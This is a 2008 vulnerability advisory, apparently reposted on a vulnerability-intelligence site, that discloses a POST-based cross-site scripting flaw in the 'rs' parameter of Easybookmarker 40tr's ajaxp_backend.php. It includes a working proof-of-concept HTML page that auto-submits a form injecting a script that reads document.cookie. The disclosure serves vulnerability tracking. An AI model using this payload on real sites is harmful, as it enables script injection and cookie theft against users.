Lucene search
easybookmaker-xss.txt
Easybookmarker 40tr Xss vulnerability in rs variable through POST metho
Show more
`----------------------------------------------------------------
Script : Easybookmarker 40tr
Type : Xss Vulnerability
Method : POST
Alert : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
My Offical Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
----------------------------------------------------------------
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
----------------------------------------------------------------
Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip
----------------------------------------------------------------
Xss Vulnerability :
Variable : rs
Send Method : POST
Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test vulnerability
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://example/zomplog/ajaxp_backend.php"
method="POST" name="form">
<input type="hidden" name="rs" value=""  <script>alert(document.cookie)</script>">
</form>
</body>
</html>
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo21 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4